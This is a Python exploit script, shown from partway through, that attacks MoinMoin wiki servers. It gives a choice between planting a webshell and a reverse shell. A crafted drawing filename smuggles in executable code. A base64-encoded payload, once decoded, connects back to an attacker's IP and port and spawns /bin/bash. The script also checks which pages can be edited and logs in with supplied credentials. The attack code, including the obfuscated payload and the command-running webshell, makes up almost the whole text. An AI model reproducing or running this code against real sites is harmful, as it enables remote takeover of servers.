target = raw_input("[*] Target site? ").replace("http://","").replace("FrontPage","").replace("WikiSandBox","")
print "[*] Method of execution:"
print "[1] Stealth webshell, available upon Apache restart (24H)"
print "[2] Backconnect shell, available immediately (RISKY)"
print "[3] Exit"
method = raw_input("> ")
if method=='3':
exit()
elif method=='2':
print "[*] Preparing exploit.."
filename = 'drawing.r if()else[]\nexec eval("open(__file__)\\56read()\\56split(\'[MARK]\')[-2]\\56strip(\'\\\\0\')")'
data = """IyAtKi0gY29kaW5nOiBpc28tODg1OS0xIC0qLQoKaW1wb3J0IHN5cywgb3MsIHNvY2tldCwgcHR5
LCBzZWxlY3QKcHdkID0gb3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKQpzeXMucGF0aC5pbnNlcnQo
MCwgcHdkKQoKZGVmIG1vaW5tZWx0c2hlbGwoaG9zdCxwb3J0KToKICAgIHNvY2sgPSBzb2NrZXQu
c29ja2V0KCkKICAgIHRyeToKICAgICAgICBzb2NrLmNvbm5lY3QoKGhvc3QsIGludChwb3J0KSkp
CiAgICBleGNlcHQ6CiAgICAgICAgcmV0dXJuCiAgICBwaWQsIGNoaWxkUHJvY2VzcyA9IHB0eS5m
b3JrKCkKICAgIGlmIHBpZCA9PSAwOgogICAgICAgIHNvY2suc2VuZCgiW35dIFx4MWJbMTszMW1N
b2luTWVsdCBSZXZlcnNlIFNoZWxsXHgxYlswbVxyXG4iKQogICAgICAgIG9zLnB1dGVudigiSElT
VEZJTEUiLCIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUFdEIiwgcHdkKQogICAgICAg
IG9zLnB1dGVudigiSE9NRSIsIG9zLmdldGN3ZCgpKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIs
Jy91c3IvbG9jYWwvc2JpbjovdXNyL3NiaW46L3NiaW46Jytvcy5nZXRlbnYoJ1BBVEgnKSkKICAg
ICAgICBvcy5wdXRlbnYoIlRFUk0iLCdsaW51eCcpCiAgICAgICAgb3MucHV0ZW52KCJQUzEiLCdc
eDFiWzE7MzFtXFx1QFxcaDpcXHdcXCQgXHgxYlswbScpCiAgICAgICAgcHR5LnNwYXduKCIvYmlu
L2Jhc2giKQogICAgICAgIHNvY2suc2VuZCgiXHJcbiIpCiAgICAgICAgc29jay5zaHV0ZG93bigx
KQogICAgZWxzZToKICAgICAgICBiID0gc29jay5tYWtlZmlsZShvcy5PX1JET05MWXxvcy5PX05P
TkJMT0NLKQogICAgICAgIGMgPSBvcy5mZG9wZW4oY2hpbGRQcm9jZXNzLCdyKycpCiAgICAgICAg
eSA9IHtiOmMsYzpifQogICAgICAgIHRyeToKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAg
ICAgICAgICAgIGZvciBuIGluIHNlbGVjdC5zZWxlY3QoW2IsY10sW10sW10pWzBdOgogICAgICAg
ICAgICAgICAgICAgIHogPSBvcy5yZWFkKG4uZmlsZW5vKCksNDA5NikKICAgICAgICAgICAgICAg
ICAgICB5W25dLndyaXRlKHopCiAgICAgICAgICAgICAgICAgICAgeVtuXS5mbHVzaCgpCiAgICAg
ICAgZXhjZXB0OgogICAgICAgICAgICBwYXNzCgp0cnk6CiAgICBwaWQgPSBvcy5mb3JrKCkKICAg
IGlmIG5vdCBwaWQ6IG1vaW5tZWx0c2hlbGwoJ1tJUF0nLCAnW1BPUlRdJykKZXhjZXB0OgogICAg
cGFzcyAjIEF2b2lkIGludGVybmFsIHNlcnZlciBlcnJvcnMKCmZyb20gTW9pbk1vaW4ud2ViLnNl
cnZpbmcgaW1wb3J0IG1ha2VfYXBwbGljYXRpb24KYXBwbGljYXRpb24gPSBtYWtlX2FwcGxpY2F0
aW9uKHNoYXJlZD1UcnVlKQ==""".strip().decode("base64")
elif method=='1':
print "[*] Preparing exploit.."
filename = "drawing.r if()else[]\nimport os\ndef execute(p,r):exec\"print>>r,os\\56popen(r\\56values['c'])\\56read()\""
data = "MoinMoin error\n"
else:
print "[-] \x1b[0;31mInvalid method\x1b[0m"
exit()
print "[*] Checking permissions on WikiSandBox page.."
username=None
password=None
authorizationcookie=None
jar=None
permission_check = requests.get("http://%s/WikiSandBox" % target).text
if "Edit (Text)" in permission_check:
print "[+] No security"
check = True
elif "Immutable Page" in permission_check:
print "[-] Authorization required"
check = False
else:
print "[-] \x1b[0;31mCould not identify editable page!\x1b[0m"
print "[-] Authorization required"
check = False
if not check:
have_acc = raw_input("[*] Do you have an account? [Y/N] ").lower()
if have_acc.startswith("y"):
username = raw_input("[*] Username: ")
password = getpass.getpass("[*] Password: ")
else:
print "[-] \x1b[0;31mCreate an account and restart the exploitation process\x1b[0m"
print "[-] %s/?action=newaccount" % target
url = "http://%s/" % target
print "[*] Logging in"
signon = {'action':'login','name':username,'password':password,'login':'Login'}
jar = requests.post(url, data=signon).cookies
for cookie in jar.values():
if len(cookie)==40:
authorizationcookie=cookie
if not authorizationcookie:
print "[-] \x1b[0;31mLogin failed\x1b[0m"
exit()
else:
print "[+] Login succeeded"
permission_check2 = requests.get("http://%s/WikiSandBox" % target).text
"""
if "Edit (Text)" in permission_check2:
print "[+] Successfully authorized to edit pages"
elif "Immutable Page" in permission_check:
print "[-] \x1b[0;31mFailed authorization check\x1b[0m"
exit()
else:
print "[?] \x1b[0;33mLost track of environment.. continuing anyway\x1b[0m"
exit()
"""